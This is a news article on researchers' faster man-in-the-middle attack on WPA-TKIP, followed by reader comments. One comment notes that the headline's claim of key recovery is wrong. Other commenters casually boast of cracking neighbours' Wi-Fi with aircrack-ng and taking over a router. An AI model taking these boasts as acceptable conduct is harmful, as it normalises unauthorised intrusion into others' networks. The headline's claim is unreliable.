WPA keys gone in 60 seconds
Time to move to WPA 2
Networking nerds claim to have devised a way of breaking Wi-Fi Protected Access (WPA) encryption within 60 seconds.
The technique, developed by Toshihiro Ohigashi of Hiroshima University and Masakatu Morii of Kobe University, is based on the established Becks-Tews method, which involves making minor changes to packets encrypted with TKIP - Temporal Key Integrity Protocol, a WPA security mechamism - and then sending those packets back to the access point.
However, the Becks-Tews method is known to take anywhere between ten and 15 minutes to execute.
In a recently released paper, Ohigashi and Morii proposed a man-in-the-middle style of attack – also used by the Beck-Tews approach – in which a user’s communication is intercepted by an attacker.
This approach carries a high risk of detection, the pair admitted, so being able to shorten the attack time down to under one minute is a major advantage – to potential hackers, at least.
Ohigashi’s and Morii’s technique doesn’t work in WPA 2 – the AES-based successor to WPA.
The pair will formally unveil their technique at a conference in Hiroshima, Japan late next month. ®
Read the paper - neither this nor Beck-Tews can recover WPA keys. You can falsify ARP packets, which is fairly significant but a world away from recovering the key and being able to read all traffic in clear. "37% of WPA-TKIP encrypted ARP can be read and falsified in best case time of 60 seconds" is very different to the message that the media has portrayed. Disappointing reporting!!
Re: Brett 1
A novice couldn't do it, but the only reason for that is it has not been pre-packaged into an easy to use GUI for Windows. If someone did that then people would be under a lot more pressure to use more secure methods.
I know very little about how the methods work, but I managed to hack three of my neighbours and steal their internets (and also took control of the router admin so that I could open some ports for my torrents - BT Home Hub had loads of vulnerabilites).
I used aircrack-ng, which is a command line tool for Linux that basically does it all for you, although it doesn't hold your hand. It took a bit of working out, but there are tutorials out there.
People think they are safe but you don't know who your neighbour is. It might be me.
as someone who has on occasion done a bit of drive by web access out of hours in times gone by.
i can confirm that them dumb AP's that blast out thier signal at max strength with a range of 100m+, sure are a boon to those of us who cannot afford to be camped out directly on the owners doorstep just to get a bit of RPG/web action.
oh and a multi-boot netbook is more than enough to do the hunting and key breaking in linux and RPG avatar web abuse in m$....